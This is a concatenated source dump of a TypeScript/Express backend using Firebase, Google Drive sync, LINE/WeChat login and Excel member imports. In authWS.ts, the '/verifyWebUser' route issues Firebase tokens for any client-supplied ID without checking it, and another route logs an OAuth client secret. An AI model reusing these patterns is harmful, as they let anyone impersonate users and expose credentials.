console.log("Existing WechatToken: ", token)
return token
}
return Axios.get(apiUrl).then(result => {
token = result.data.access_token
console.log("Get WechatToken: ", token)
cache.set("accessToken", token, 7000)
return token
})
}
const getURLfromString = (message: string): string[] | null => {
const regex = new RegExp(/[-a-zA-Z0-9@:%_\+.~#?&//=]{2,256}\.[a-z]{2,4}\b(\/[-a-zA-Z0-9@:%_\+.~#?&//=]*)?/gi)
return regex.exec(message)
}
<file_sep>/src/services/groupMessageService.ts
import * as admin from 'firebase-admin';
import { BatchGroup } from '../model';
const batchGroupCollection = admin.firestore().collection("GroupMessage");
export const getBatchGroupById = function (id: string) {
return batchGroupCollection.where("id", "==", id).get()
}
export const getBatchGroupByName = function (name: string) {
return batchGroupCollection.where("name", "==", name).get()
}
export const setBatchGroup = function (member: BatchGroup) {
return batchGroupCollection.doc(member.id).set(member, { merge: true })
}
export const deleteBatchGroup = function (id: string) {
return batchGroupCollection.doc(id).delete()
}<file_sep>/src/services/driveService.ts
import { google } from "googleapis"
import { OAuth2Client } from "google-auth-library"
import * as admin from 'firebase-admin';
import { google_client_secret_drive, drive_token } from "../config"
import { File } from '../model'
import * as mime from "mime"
var fs = require('fs');
const addFile = (file: File): Promise<any> => {
return admin.firestore().collection("File").doc(file.id).set(file, { merge: true })
}
const addNowProperty = (file: File, now: number): Promise<any> => {
return admin.firestore().collection("File").doc(file.id).set({ modifiedDate: now },
{ merge: true })
}
export const getFiles = function () {
return admin.firestore().collection("File").get()
}
export const getFolders = function () {
return admin.firestore().collection("File").where("mimeType", "==", "application/vnd.google-apps.folder").get()
}
export const getFileByName = (fileName: string) => {
return admin.firestore().collection("File").where("name", "==", fileName).get()
}
export const getFileById = (id: string) => {
return admin.firestore().collection("File").doc(id).get()
}
export const getFilesByParentId = (id: string) => {
return admin.firestore().collection("File").where("parents", "==", id).get()
}
export const rename = (file: File): Promise<any> => {
let docId = file.id
if (file.modifiedDate == 9999999999999) {
docId = file.docId
return admin.firestore().collection("File").doc(file.docId).set(file,
{ merge: true })
} else {
return admin.firestore().collection("File").doc(file.id).set(file,
{ merge: true })
}
}
export const deleteFileById = (id: string) => {
return admin.firestore().collection("File").doc(id).delete()
}
export const setFilePath = function (file) {
return admin.firestore().collection("File").doc(file.docId).set(file, { merge: true })
}
export const authorize = (): Promise<OAuth2Client> => {
return new Promise(resolve => {
const secret = google_client_secret_drive.installed.client_secret
const clientId = google_client_secret_drive.installed.client_id
const redirectUrl = google_client_secret_drive.installed.redirect_uris[0]
const oauth2Client = new OAuth2Client(clientId, secret, redirectUrl)
oauth2Client.setCredentials({
access_token: drive_token.access_token,
token_type: drive_token.token_type,
refresh_token: drive_token.refresh_token,
expiry_date: drive_token.expiry_date
})
resolve(oauth2Client)
})
}
export const addNowToFile = (auth: OAuth2Client, parentId: string, now: number): Promise<string> => {
return new Promise((resolve, reject) => {
const drive = google.drive({ version: 'v3', auth });
drive.files.list({
q: `'${parentId}' in parents and trashed = false`,
fields: 'nextPageToken, files(id, name,parents,mimeType)',
}, async (err, { data }) => {
if (err) {
console.error("err:", err.response);
return reject(err.response.data)
}
const files = data.files;
if (files.length > 0) {
for (const file of files) {
file["modifiedDate"] = now
await addNowProperty(file, now)
if (file.mimeType == "application/vnd.google-apps.folder") {
try {
await addNowToFile(auth, file.id, now)
} catch (err) {
console.log(err)
}
}
}
} else {
console.log('An empty folder found.');
}
resolve()
})
})
}
export const listFiles = (auth: OAuth2Client, parentId: string, parentsName: any[], now: number, pageToken?: string): Promise<string> => {
return new Promise((resolve, reject) => {
// console.log("Pid:", parentId);
const drive = google.drive({ version: 'v3', auth });
drive.files.list({
q: `'${parentId}' in parents and trashed = false`,
fields: 'nextPageToken, files(id, name,parents,mimeType, createdTime, modifiedTime)',
pageToken: pageToken
}, async (err, response) => {
if (err || !response.data) {
console.error("err:", err.response);
return reject(err.response.data)
} else {
const files: File[] = response.data.files;
if (files && files.length > 0) {
// console.log('Number of Files in ', parentId + " is " + files.length);
let fullName = ""
for (const file of files) {
fullName = file.name
file.fullName = file.name
file["docId"] = file.id
if (file.name.indexOf(".") != -1) {
if (!isNaN(Number(file.name.substring(0, file.name.indexOf("."))))) {
if ((fullName.match(/\./g) || []).length == 2) {
file.sid = parseInt(file.name.substring(0, file.name.indexOf(".")))
file.name = file.name.substring(file.name.indexOf(".") + 1, file.name.length)
} else {
if (file.mimeType == "application/vnd.google-apps.folder") {
file.sid = parseInt(file.name.substring(0, file.name.indexOf(".")))
file.name = file.name.substring(file.name.indexOf(".") + 1, file.name.length)
} else {
file.sid = 0
}
}
} else {
// console.log("No sid:", file.name.substring(0, file.name.indexOf(".")))
file.sid = 0
}
} else {
// console.log("No sid:", file.name.substring(0, file.name.indexOf(".")))
file.sid = 0
}
if (file.mimeType != "application/vnd.google-apps.folder") {
if (file.name.lastIndexOf(".") != -1) {
// console.log("Has file ext:", file.name.lastIndexOf("."))
file.name = file.name.substring(0, file.name.lastIndexOf("."))
} else {
// console.log("No file ext:", file.name.indexOf("."))
}
}
file.parentsName = parentsName
file.modifiedDate = now
file.parents = file.parents[0]
file.createdTime = new Date(file.createdTime).getTime()
file.modifiedTime = new Date(file.modifiedTime).getTime()
if (file.name != "SBSE____") {
await addFile(file)
}
if (file.mimeType == "application/vnd.google-apps.folder") {
try {
let pName = file.parentsName.slice()
pName.push({ fullName: fullName, name: file.name, id: file.id })
await listFiles(auth, file.id, pName, now)
} catch (err) {
console.log(err)
}
// folders.push(file)
}
}
if (response.data.nextPageToken) {
await listFiles(auth, parentId, parentsName, now, response.data.nextPageToken)
}
} else {
console.log('No files found.');
}
resolve()
}
});
})
}
export const createFile = (auth: OAuth2Client, name: string, path: string, type: string, now: number): Promise<string> => {
return new Promise((resolve, reject) => {
const drive = google.drive({ version: 'v3', auth });
let fileDBRec: File = { id: "", docId: "", sid: 0, mimeType: "", modifiedDate: 0, name: "", fullName: "", parents: "", parentsName: [], modifiedTime: 0, createdTime: 0 }
let parentName = []
let fileMetadata = {
'name': name,
'mimeType': `application/vnd.google-apps.${type}`,
parents: [path]
};
name.substring(name.lastIndexOf(".") + 1, name.length)
drive.files.create({
resource: fileMetadata,
fields: 'id'
}, async function (err, file) {
if (err) {
// Handle error
console.error("err:", err.response);
reject("err")
} else {
console.log(`${type} Id: ${file.data.id} ${name} ${path} ${type}`);
await getFileById(path).then(async doc => {
if (doc.exists) {
parentName = doc.data().parentsName.slice()
parentName.push({ fullName: doc.data().fullName, name: doc.data().name, id: path })
}
})
fileDBRec["fullName"] = name
fileDBRec["name"] = name
fileDBRec["docId"] = file.data.id
fileDBRec["id"] = file.data.id
fileDBRec["parents"] = path
fileDBRec["mimeType"] = `application/vnd.google-apps.${type}`
fileDBRec["parentsName"] = parentName
fileDBRec["modifiedDate"] = now
if (fileDBRec.name.indexOf(".") != -1) {
if (!isNaN(Number(fileDBRec.name.substring(0, fileDBRec.name.indexOf("."))))) {
if ((name.match(/\./g) || []).length == 2) {
fileDBRec["sid"] = parseInt(fileDBRec.name.substring(0, fileDBRec.name.indexOf(".")))
fileDBRec["name"] = fileDBRec.name.substring(fileDBRec.name.indexOf(".") + 1, fileDBRec.name.length)
} else {
if (fileDBRec.mimeType == "application/vnd.google-apps.folder") {
fileDBRec["sid"] = parseInt(fileDBRec.name.substring(0, fileDBRec.name.indexOf(".")))
fileDBRec["name"] = fileDBRec.name.substring(fileDBRec.name.indexOf(".") + 1, fileDBRec.name.length)
} else {
fileDBRec["sid"] = 0
}
}
} else {
// console.log("No sid:",.name.substring(0, .name.indexOf(".")))
fileDBRec["sid"] = 0
}
} else {
// console.log("No sid:",.name.substring(0, .name.indexOf(".")))
fileDBRec["sid"] = 0
}
if (fileDBRec.mimeType != "application/vnd.google-apps.folder") {
if (fileDBRec.name.lastIndexOf(".") != -1) {
// console.log("Has ext:", .name.lastIndexOf("."))
fileDBRec["name"] = fileDBRec.name.substring(0, fileDBRec.name.lastIndexOf("."))
} else {
// console.log("No ext:",.name.indexOf("."))
}
}
console.log("fileDBRec:", fileDBRec)
await rename(fileDBRec)
resolve(file.data.id);
}
});
})
}
export const createFileWithFile = (auth: OAuth2Client, name: string, path: string, type: string, now: number): Promise<string> => {
return new Promise((resolve, reject) => {
const drive = google.drive({ version: 'v3', auth });
let fileDBRec: File = {
name: "", sid: 0, fullName: "", parents: "", parentsName: [], id: "", docId: "", mimeType: "", modifiedDate: 0, modifiedTime: 0, createdTime: 0
}
let parentName = []
var fileMetadata = {
'name': name,
parents: [path]
};
console.log("fileContent:", " " + mime.getType(name.substring(name.lastIndexOf(".") + 1, name.length)))
var media = {
mimeType: mime.getType(name.substring(name.lastIndexOf(".") + 1, name.length)),
body: fs.createReadStream('fileTemp')
};
drive.files.create({
resource: fileMetadata,
media: media,
fields: 'id'
}, async function (err, file) {
if (err) {
// Handle error
console.error("err:", err.response);
reject("err")
} else {
console.log(`${type} Id: ${file.data.id} ${name} ${path} ${type}`);
await getFileById(path).then(async doc => {
if (doc.exists) {
parentName = doc.data().parentsName.slice()
parentName.push({ fullName: doc.data().fullName, name: doc.data().name, id: path })
}
})
fileDBRec["fullName"] = name
fileDBRec["name"] = name
fileDBRec["docId"] = file.data.id
fileDBRec["id"] = file.data.id
fileDBRec["parents"] = path
fileDBRec["mimeType"] = mime.getType(name.substring(name.lastIndexOf(".") + 1, name.length)).toString()
fileDBRec["parentsName"] = parentName
fileDBRec["modifiedDate"] = now
if (fileDBRec.name.indexOf(".") != -1) {
if (!isNaN(Number(fileDBRec.name.substring(0, fileDBRec.name.indexOf("."))))) {
if ((name.match(/\./g) || []).length == 2) {
fileDBRec["sid"] = parseInt(fileDBRec.name.substring(0, fileDBRec.name.indexOf(".")))
fileDBRec["name"] = fileDBRec.name.substring(fileDBRec.name.indexOf(".") + 1, fileDBRec.name.length)
} else {
if (fileDBRec.mimeType == "application/vnd.google-apps.folder") {
fileDBRec["sid"] = parseInt(fileDBRec.name.substring(0, fileDBRec.name.indexOf(".")))
fileDBRec["name"] = fileDBRec.name.substring(fileDBRec.name.indexOf(".") + 1, fileDBRec.name.length)
} else {
fileDBRec["sid"] = 0
}
}
} else {
// console.log("No sid:",.name.substring(0, .name.indexOf(".")))
fileDBRec["sid"] = 0
}
} else {
// console.log("No sid:",.name.substring(0, .name.indexOf(".")))
fileDBRec["sid"] = 0
}
if (fileDBRec.mimeType != "application/vnd.google-apps.folder") {
if (fileDBRec.name.lastIndexOf(".") != -1) {
// console.log("Has ext:", .name.lastIndexOf("."))
fileDBRec["name"] = fileDBRec.name.substring(0, fileDBRec.name.lastIndexOf("."))
} else {
// console.log("No ext:",.name.indexOf("."))
}
}
console.log("fileDBRec:", fileDBRec)
await rename(fileDBRec)
resolve(file.data.id);
}
});
})
}
export const deleteFilesForSync = (batchSize: number, now: number, rootFolderId: string) => {
var collectionRef = admin.firestore().collection("File");
var query = collectionRef.where("modifiedDate", "<", now).orderBy('modifiedDate')
return new Promise((resolve, reject) => {
deleteQueryBatch(query, batchSize, resolve, reject, now, rootFolderId);
console.log("deleteFilesForSync")
});
}
export const deleteQueryBatch = async (query, batchSize, resolve, reject, now, rootFolderId) => {
query.get()
.then(async (snapshot) => {
// When there are no documents left, we are done
if (snapshot.size == 0) {
console.log("snapshot.size")
return 0;
}
// Delete documents in a batch
var batch = admin.firestore().batch();
var numberLimit = 0
snapshot.docs.forEach(async doc => {
if (doc.data().hasOwnProperty('parentsName') && numberLimit < 500) {
if (doc.data().parentsName.length > 0) {
if (doc.data().modifiedDate != now && doc.data().parentsName[0].id == rootFolderId) {
console.log("deleted file:", doc.data().name + doc.data().modifiedDate + " " + now + " " + doc.data().parentsName[0].id + " " + rootFolderId);
batch.delete(doc.ref);
numberLimit++
}
}
}
});
return batch.commit().then(() => {
console.log("batch.commit()", numberLimit)
return 0
});
}).then((numDeleted) => {
if (numDeleted === 0) {
console.log("numDeleted === 0")
resolve();
return;
} else {
console.log("Recurse on the next process tick")
}
process.nextTick(() => {
deleteQueryBatch(query, batchSize, resolve, reject, now, rootFolderId);
});
})
.catch(reject);
}
export const deleteFile = (auth: OAuth2Client, fileId: string): Promise<string> => {
return new Promise((resolve, reject) => {
// const drive = google.drive({ version: 'v3', auth });
// drive.files.delete({
// 'fileId': fileId
// }, function (err, file) {
// if (err) {
// // Handle error
// console.error("err:", err.response);
// reject("err")
// } else {
deleteFileById(fileId).then().catch(err => { })
getFilesByParentId(fileId).then(foldersSnapshot => {
if (!foldersSnapshot.empty) {
let folders = []
foldersSnapshot.forEach(folderdoc => folders.push(folderdoc.data()))
for (const folder of folders) {
console.log("folder.id:", folder.id + " " + folder.name)
deleteFileById(folder.id)
}
}
})
console.log(` Id: file deleted`);
resolve("file deleted");
// }
// });
})
}
export const renameFile = (auth: OAuth2Client, fileId: string, fullName: string, now: number): Promise<string> => {
return new Promise(async (resolve, reject) => {
const drive = google.drive({ version: 'v3', auth });
let file
let ext = ""
await getFileById(fileId).then(async doc => {
if (doc.exists) {
file = doc.data()
file["modifiedDate"] = now
file.name = fullName
if (file.name.indexOf(".") != -1) {
if (!isNaN(Number(file.name.substring(0, file.name.indexOf("."))))) {
file["sid"] = parseInt(file.name.substring(0, file.name.indexOf(".")))
file["name"] = file.name.substring(file.name.indexOf(".") + 1, file.name.length)
} else {
// console.log("No sid:", file.name.substring(0, file.name.indexOf(".")))
file["sid"] = 0
}
} else {
// console.log("No sid:", file.name.substring(0, file.name.indexOf(".")))
file["sid"] = 0
}
if (file.mimeType != "application/vnd.google-apps.folder") {
if (file.fullName.lastIndexOf(".") != -1) {
ext = file.fullName.substring(file.fullName.lastIndexOf(".") + 1, file.fullName.length)
file["fullName"] = fullName + "." + ext
console.log("ext:", ext)
} else {
file["fullName"] = fullName
}
} else {
file["fullName"] = fullName
}
}
})
console.log("file:", file)
await rename(file)
if (file.mimeType == "application/vnd.google-apps.folder") {
try {
let pName = file["parentsName"].slice()
pName.push({ fullName: fullName, name: file.name, id: file.id })
await listFiles(auth, file.id, pName, now)
} catch (err) {
console.log(err)
}
}
let fileMetadata = {
'name': file.fullName,
'mimeType': file.mimeType
};
drive.files.update({
resource: fileMetadata,
'fileId': fileId,
fields: 'id'
}, function (err, file) {
if (err) {
// Handle error
console.error("err:", err.response);
resolve("err")
} else {
console.log(`The fileId of renamed file : ${file.data.id}`);
resolve(file.data.id);
}
});
})
}
export const moveFile = (auth: OAuth2Client, fileId: string, folderId: string, now: number): Promise<string> => {
return new Promise(async (resolve, reject) => {
const drive = google.drive({ version: 'v3', auth });
let fileInfo
let folderInfo
await getFileById(fileId).then(async doc => {
if (doc.exists) {
fileInfo = doc.data()
fileInfo["modifiedDate"] = now
fileInfo["parents"] = folderId
getFileById(folderId).then(folder => {
if (folder.exists) {
folderInfo = folder.data()
let pName = fileInfo["parentsName"].slice()
pName.push({ fullName: folderInfo.name, name: folderInfo.name, id: folderId })
fileInfo["parentsName"] = pName
console.log("file:", fileInfo)
rename(fileInfo)
}
})
}
})
// Retrieve the existing parents to remove
drive.files.get({
fileId: fileId,
fields: 'parents'
}, function (err, file) {
if (err) {
// Handle error
console.error("get err:", err.response.data);
resolve("get err")
} else {
console.log("get file:", file.data);
// Move the file to the new folder
var previousParents = file.data.parents.join(',');
drive.files.update({
fileId: fileId,
addParents: folderId,
removeParents: previousParents,
fields: 'id, parents'
}, function (err, file) {
if (err) {
// Handle error
console.error("err:", err.response);
resolve("err")
} else {
console.log(`The fileId of moved file : ${file.data.id}`);
resolve(file.data.id);
}
});
}
});
})
}
<file_sep>/src/services/structureService.ts
import * as admin from 'firebase-admin';
import { IssueOrganization } from '../model';
const structureCollection = admin.firestore().collection("IssueOrganization");
export const getStructures = function () {
return structureCollection.where("type", "==", "issue").get()
}
export const getStructuresByType = function (type: string) {
return structureCollection.where("type", "==", type).get()
}
export const getStructureByIssueId = function (companyName: string) {
return structureCollection.where("issueId", "==", companyName).get()
}
export const getStructureByParentId = function (companyName: string) {
return structureCollection.where("parentId", "==", companyName).get()
}
export const setStructure = function (member: IssueOrganization) {
return structureCollection.doc(member.id).set(member, { merge: true })
}<file_sep>/src/authWS.ts
import { Router } from "express"
import axios from "axios"
import * as queryString from "querystring"
import * as jwt from "jsonwebtoken"
import * as jws from "jws"
import * as memberService from './services/memberService'
import { jwtSecretKey, uriName, ServerUrlPrefix, lineLoginConfig, wechatAccount } from './config'
import * as admin from 'firebase-admin';
const router = Router()
function generateFirebaseToken(userId) {
let firebaseUid = userId;
// admin.auth().dis
return admin.auth().createCustomToken(firebaseUid);
}
router.post("/verifyLineUser", async (req, res) => {
const code = req.body.code
const page = req.body.page
console.log("----", code + " " + page)
console.log(queryString.stringify({
grant_type: "authorization_code",
code: code,
redirect_uri: lineLoginConfig.redirectUri + (page ? page : "login"),
client_id: lineLoginConfig.clientId,
client_secret: lineLoginConfig.clientSecret
}))
const lineVerifyResult = await axios.post("https://api.line.me/oauth2/v2.1/token", queryString.stringify({
grant_type: "authorization_code",
code: code,
redirect_uri: lineLoginConfig.redirectUri + (page ? page : "login"),
client_id: lineLoginConfig.clientId,
client_secret: lineLoginConfig.clientSecret
}), {
headers: {
"Content-Type": "application/x-www-form-urlencoded"
}
}).catch(error => {
console.log("lineVerify failed")
return null
})
if (lineVerifyResult != null) {
const lineToken = lineVerifyResult.data.id_token
const profile = jwt.verify(lineToken, lineLoginConfig.clientSecret) as any
console.log(profile)
memberService.getMemberByAnyId(profile.sub).then(async snapshot => {
if (!snapshot.empty) {
let sales = snapshot.docs[0].data()
if (!sales.unfollow && sales.isActive) {
let firebaseToken = await generateFirebaseToken(sales.lineId).catch(error => {
console.log("generateFirebaseToken error:", error)
})
res.status(200).send({ lineId: sales.lineId, token: firebaseToken, name: sales.name, divsionName: sales.divsionName })
} else
res.status(403).send({ lineId: profile.sub, msg: "member is not active" })
} else
res.status(403).send({ lineId: profile.sub, msg: "snapshot is empty" })
}).catch(error => {
console.log("verify user error:", error)
res.status(403).send("verify failed, please retry.")
})
} else {
res.status(403).send("verify failed")
}
})
router.post("/verifyWechatUser", async (req, res) => {
const code = req.body.code
const wechatVerifyResult = await axios.get(`https://api.weixin.qq.com/sns/oauth2/access_token?appid=${wechatAccount.id}&secret=${wechatAccount.secret}&code=${code}&grant_type=authorization_code`)
if (wechatVerifyResult != null) {
const wechatId = wechatVerifyResult.data.openid
memberService.getMemberByAnyId(wechatId).then(async snapshot => {
if (!snapshot.empty) {
let member = snapshot.docs[0].data()
if (!member.unfollow && member.isActive) {
let firebaseToken = await generateFirebaseToken(member.wechatId).catch(error => {
console.log("generateFirebaseToken error:", error)
})
res.status(200).send({ wechatId: member.wechatId, token: firebaseToken, name: member.name, divsionName: member.divsionName })
} else
res.status(403).send({ wechatId: wechatId })
} else
res.status(403).send({ wechatId: wechatId })
}).catch(error => {
console.log("verify user error:", error)
res.status(403).send("verify failed, please retry.")
})
} else {
res.status(403).send("verify failed")
}
})
router.post("/verifyWebUser", async (req, res) => {
const code = req.body.code
let firebaseToken = await generateFirebaseToken(code).catch(error => {
console.log("generateFirebaseToken error:", error)
res.status(403).send({ error: error })
})
res.status(200).send({ token: firebaseToken })
})
router.post("/verifyUser", (req, res) => {
const accessToken = req.body.accessToken
jwt.verify(accessToken, jwtSecretKey, (err, result) => {
if (err) {
console.log("verifyUser err:", err)
res.status(403).send("Not Authorized")
} else {
console.log("verifyUser result:", result)
const now = Date.now()
if (Math.floor(now / 1000) - result.iat < 900) { // in 15 mins
memberService.getMemberByAnyId(result.sub).then(salesSnapshot => {
if (!salesSnapshot.empty) {
const newToken = jws.sign({
header: { alg: "HS512" },
payload: {
sub: result.sub,
iat: Math.floor(now / 1000) + (15 * 60)
},
secret: jwtSecretKey
})
console.log("newToken:", newToken)
res.status(200).send(newToken)
} else {
res.status(403).send("Not Authorized")
}
}).catch(error => {
console.log("verifyUser failed:", error)
res.status(403).send("Not Authorized")
})
} else
res.status(403).send("Not Authorized")
}
})
})
// app.use(ServerUrlPrefix, router)
export default router<file_sep>/src/memberWS.ts
import { Router } from "express"
import { v4 as uuidv4 } from "uuid"
import * as XLSX from 'xlsx'
import * as memberService from "./services/memberService"
import * as groupService from "./services/groupService"
import * as batchGroupService from "./services/groupMessageService"
import { Member, Group, BatchGroup } from "./model"
const router = Router()
router.post("/importGroup", async (req, res) => {
let base64String = req.body.file;
let base64Image = base64String.split(';base64,').pop();
/* data is a node Buffer that can be passed to XLSX.read */
let workbook = XLSX.read(base64Image, { type: 'base64' });
let data: string[][] = XLSX.utils.sheet_to_json(workbook.Sheets[workbook.SheetNames[0]], { header: 1 });
let ownerId = ""
let groupName: string = ""
let type: string = ""
let memberUploads = new Array<{ personalId: string, name?: string, mobilePhone?: string, email?: string, index?: number, message: string }>()
if (req.body.hasOwnProperty("ownerId")) {
ownerId = req.body.ownerId
}
if (req.body.hasOwnProperty("groupName")) {
groupName = req.body.groupName
}
for (let i = 1; i < data.length; i++) {
let cols = data[i]
if (cols.length >= 1) {
if (cols.length <= 1) {
cols[1] = ""
}
let newMember = {
personalId: cols[0] || "",
message: cols[1] || ""
}
memberUploads.push({
personalId: newMember.personalId.toString().trim(),
message: newMember.message.toString().trim()
})
if (cols[1].toString().trim() == "") {
type = "messageless"
} else {
type = ""
}
}
}
let newGroup: Group = { id: uuidv4(), name: groupName, memberId: [], ownerId: ownerId }
let newGroupMessage: BatchGroup = { id: uuidv4(), name: groupName, members: [], ownerId: ownerId }
// console.log("memberUploads:", memberUploads)
for (const memberUpload of memberUploads) {
/**
* 檢查Member主檔是否存在
*/
const memberSnapshot = await memberService.getMembersByName(memberUpload.personalId)
let member: Member
if (memberSnapshot.empty) {
console.log("====Member不存在====")
} else {
// 若存在則檢查是否更新
member = memberSnapshot.docs[0].data() as Member
if (newGroup.memberId.indexOf(member.id) < 0) {
newGroup.memberId.push(member.id)
}
if (memberUpload.message != "") {
newGroupMessage.members.push({ id: member.id, content: memberUpload.message })
}
// console.log("memberUpload:", memberUpload)
if (memberUpload.message != "") {
if (member.hasOwnProperty("data")) {
member = {
...member,
data: [{
message: memberUpload.message
}]
}
} else {
member = {
...member,
data: [{
message: memberUpload.message
}]
}
}
// await memberService.updateMember(member)
}
}
}
console.log("importGroup:", newGroup)
console.log("importGroupMessage:", newGroupMessage)
if (type == "messageless") {
await groupService.setGroup(newGroup)
} else {
await batchGroupService.setBatchGroup(newGroupMessage)
}
res.sendStatus(200)
})
router.post("/updateGroup", async (req, res) => {
let data: Group = req.body
await groupService.setGroup(data).then(success => {
res.sendStatus(200)
}).catch(err => {
res.sendStatus(403)
})
})
router.post("/updateBatchGroup", async (req, res) => {
let data: BatchGroup = req.body
await batchGroupService.setBatchGroup(data).then(success => {
res.sendStatus(200)
}).catch(err => {
res.sendStatus(403)
})
})
router.delete("/deleteGroup/:groupId", async (req, res) => {
let groupId: string = req.params.groupId
await groupService.deleteGroup(groupId).then(success => {
res.sendStatus(200)
}).catch(err => {
res.sendStatus(403)
})
})
router.delete("/deleteBatchGroup/:batchGroupId", async (req, res) => {
let batchGroupId: string = req.params.batchGroupId
await batchGroupService.deleteBatchGroup(batchGroupId).then(success => {
res.sendStatus(200)
}).catch(err => {
res.sendStatus(403)
})
})
router.post("/importMember", async (req, res) => {
let base64String = req.body.file;
let base64Image = base64String.split(';base64,').pop();
/* data is a node Buffer that can be passed to XLSX.read */
let workbook = XLSX.read(base64Image, { type: 'base64' });
let data: string[][] = XLSX.utils.sheet_to_json(workbook.Sheets[workbook.SheetNames[0]], { header: 1 });
let memberUploads = new Array<{ personalId: string, name: string, title: string, division: string, department: string, mobilePhone: string, email: string, lineId?: string, wechatId?: string, index?: number, referrer?: string }>()
for (let i = 1; i < data.length; i++) {
let cols = data[i]
if (cols.length >= 8) {
if (!cols[10]) {
cols[10] = ""
}
if (!cols[9]) {
cols[9] = new Date().getTime().toString()
}
// console.log("cols:", cols)
let newMember = {
personalId: cols[0] || uuidv4(),
name: cols[1] || "",
title: cols[2] || "",
division: cols[3] || "",
department: cols[4] || "",
mobilePhone: cols[5] || "",
email: cols[6] || "",
lineId: cols[7] || "",
wechatId: cols[8] || "",
index: +cols[9],
referrer: cols[10].toString().trim()
}
memberUploads.push({
personalId: newMember.personalId.toString().trim(),
name: newMember.name.toString().trim(),
title: newMember.title.toString().trim(),
division: newMember.division.toString().trim(),
department: newMember.department.toString().trim(),
mobilePhone: newMember.mobilePhone.toString().trim(),
email: newMember.email.toString().trim(),
lineId: newMember.lineId.toString().trim(),
wechatId: newMember.wechatId.toString().trim(),
index: +cols[9],
referrer: cols[10].toString().trim()
})
}
}
for (const memberUpload of memberUploads) {
/**
* 檢查Member主檔是否存在
*/
const memberSnapshot = await memberService.getMemberByMobilePhoneAndName(memberUpload.mobilePhone, memberUpload.name)
let member: Member
if (memberSnapshot.empty) {
console.log("====Member不存在====")
// 不存在則建立Member
if (!memberUpload.index) {
memberUpload.index = new Date().getTime()
}
member = {
id: memberUpload.personalId,
name: memberUpload.name,
title: memberUpload.title,
division: memberUpload.division,
department: memberUpload.department,
email: memberUpload.email,
mobilePhone: memberUpload.mobilePhone,
lineId: memberUpload.lineId,
wechatId: memberUpload.wechatId,
role: "customer",
index: memberUpload.index,
unReadMessages: 0
}
} else {
// 若存在則檢查是否更新職稱、部門、單位
member = memberSnapshot.docs[0].data() as Member
// if (memberUpload.title && memberUpload.title !== "")
// member.title = memberUpload.title
if (memberUpload.division && memberUpload.division !== "")
member.division = memberUpload.division
if (memberUpload.department && memberUpload.department !== "")
member.department = memberUpload.department
// // 若存在則檢查是否更新LineId、WeChatId
// if (memberUpload.lineId && memberUpload.lineId !== "")
// member.lineId = memberUpload.lineId
// if (memberUpload.wechatId && memberUpload.wechatId !== "")
// member.wechatId = memberUpload.wechatId
}
await memberService.setMember(member)
console.log("--------------------------------------------------")
}
res.sendStatus(200)
})
router.post("/updateMember", async (req, res) => {
const content: Member = req.body
console.log("updateMember:", content)
let newMember: Member = {
...content
}
await memberService.setMember(newMember).then(success => {
res.sendStatus(200)
}).catch(err => {
res.sendStatus(403)
})
console.log("--------------------------------------------------")
})
router.delete("/deleteMember/:memberId", async (req, res) => {
let memberId: string = req.params.memberId
await memberService.deleteMember(memberId).then(success => {
res.sendStatus(200)
}).catch(err => {
res.sendStatus(403)
})
})
export default router
<file_sep>/src/services/messageRecordService.ts
import { firestore } from "firebase-admin"
import { MessageRecord, RecordDetail } from "../model"
const messageRecordCollection = firestore().collection("MessageRecord")
export const getMessageRecordUUID = (): string => {
return messageRecordCollection.doc().id
}
export const setMessageRecord = (messageRecord: MessageRecord) => {
return messageRecordCollection
.doc(messageRecord.id)
.set(messageRecord, { merge: true })
}
export const getRecordDetailUUID = (messageRecordId: string): string => {
return messageRecordCollection.doc(messageRecordId).collection("RecordDetail").doc().id
}
export const setRecordDetail = (messageRecordId: string, recordDetail: RecordDetail) => {
return messageRecordCollection
.doc(messageRecordId)
.collection("RecordDetail")
.doc(recordDetail.id)
.set(recordDetail, { merge: true })
}
export const setRecordDetailMQ = (messageRecordId: string, recordDetail: any) => {
return messageRecordCollection
.doc(messageRecordId)
.collection("RecordDetail")
.doc(recordDetail.id)
.set(recordDetail, { merge: true })
}
export const getMessageRecords = () => {
return messageRecordCollection.get()
}
export const getMessageRecordById = (messageRecordId: string) => {
return messageRecordCollection.doc(messageRecordId).get()
}
export const getRecordDetails = (messageRecordId: string) => {
return messageRecordCollection
.doc(messageRecordId)
.collection("RecordDetail")
.get()
}
export const getRecordDetailById = (messageRecordId: string, recordDetailId: string) => {
return messageRecordCollection.doc(messageRecordId)
.collection("RecordDetail").doc(recordDetailId)
.get()
}<file_sep>/src/services/userService.ts
import * as admin from "firebase-admin"
import { idLength } from "../config"
import { User } from "../model"
const userCollection = admin.firestore().collection("User")
export const getUserById = (id: string) => {
return userCollection.doc(id).get().then(doc => {
if (doc.exists)
return doc.data() as User
return null
})
}
export const getUserByEmail = function (email: string) {
return userCollection.where("email", "==", email).get()
}
export const setUser = function (user: User) {
// console.log(JSON.stringify(user, null, 4))
return userCollection.doc(user.id).set(user, { merge: true })
}
export const deleteUser = function (id: string) {
return userCollection.doc(id).delete()
}<file_sep>/src/services/issueService.ts
import * as admin from 'firebase-admin';
import { Issue } from '../model';
const issueCollection = admin.firestore().collection("Issue");
export const getIssues = function() {
return issueCollection.get()
}
export const getIssueById = function (companyName: string) {
return issueCollection.where("id", "==", companyName).get()
}
export const getIssueByParentId = function (companyName: string) {
return issueCollection.where("parentId", "==", companyName).get()
}
export const setIssue = function (member: Issue) {
return issueCollection.doc(member.id).set(member, { merge: true })
}<file_sep>/src/pushMessageWS.ts
import { Router } from "express"
import * as messageRecordService from "./services/messageRecordService"
import * as memberService from "./services/memberService"
import { pushMessage as pushLineMessage, toPersonMessage, toLineTextMessage } from "./services/lineService"
import { pushTemplateMessages as pushWechatMessages, pushCustomMessage, toTemplateMessagesMQ, toCustomTextMessage } from "./services/wechatService"
import { pushMessage as pushSMSMessage, toSMSMessage } from "./services/smsService"
import { pushMessage as pushEmailMessage, getEmailFiles, toEmailMessage } from "./services/emailService"
import { Receiver, Member, RecordDetail, ChatMessage, MessageTemplate } from "./model"
import * as chatMessageService from './services/chatMessageService'
import { backendUrl, idLength } from "./config"
import { resolve } from "path";
const router = Router()
router.post("/pushMessage", async (req, res, next) => {
const sender: Member = req.body.sender
const receivers: Receiver[] = req.body.receivers
const messageTemplate: MessageTemplate = req.body.messageObj
let content: string = ""
let storageUrls: MessageTemplate["urls"] = []
let thumb: string = ""
if (req.body.hasOwnProperty("messageObj")) {
content = req.body.messageObj.content
if (req.body.messageObj.hasOwnProperty("urls")) {
storageUrls = req.body.messageObj.urls
}
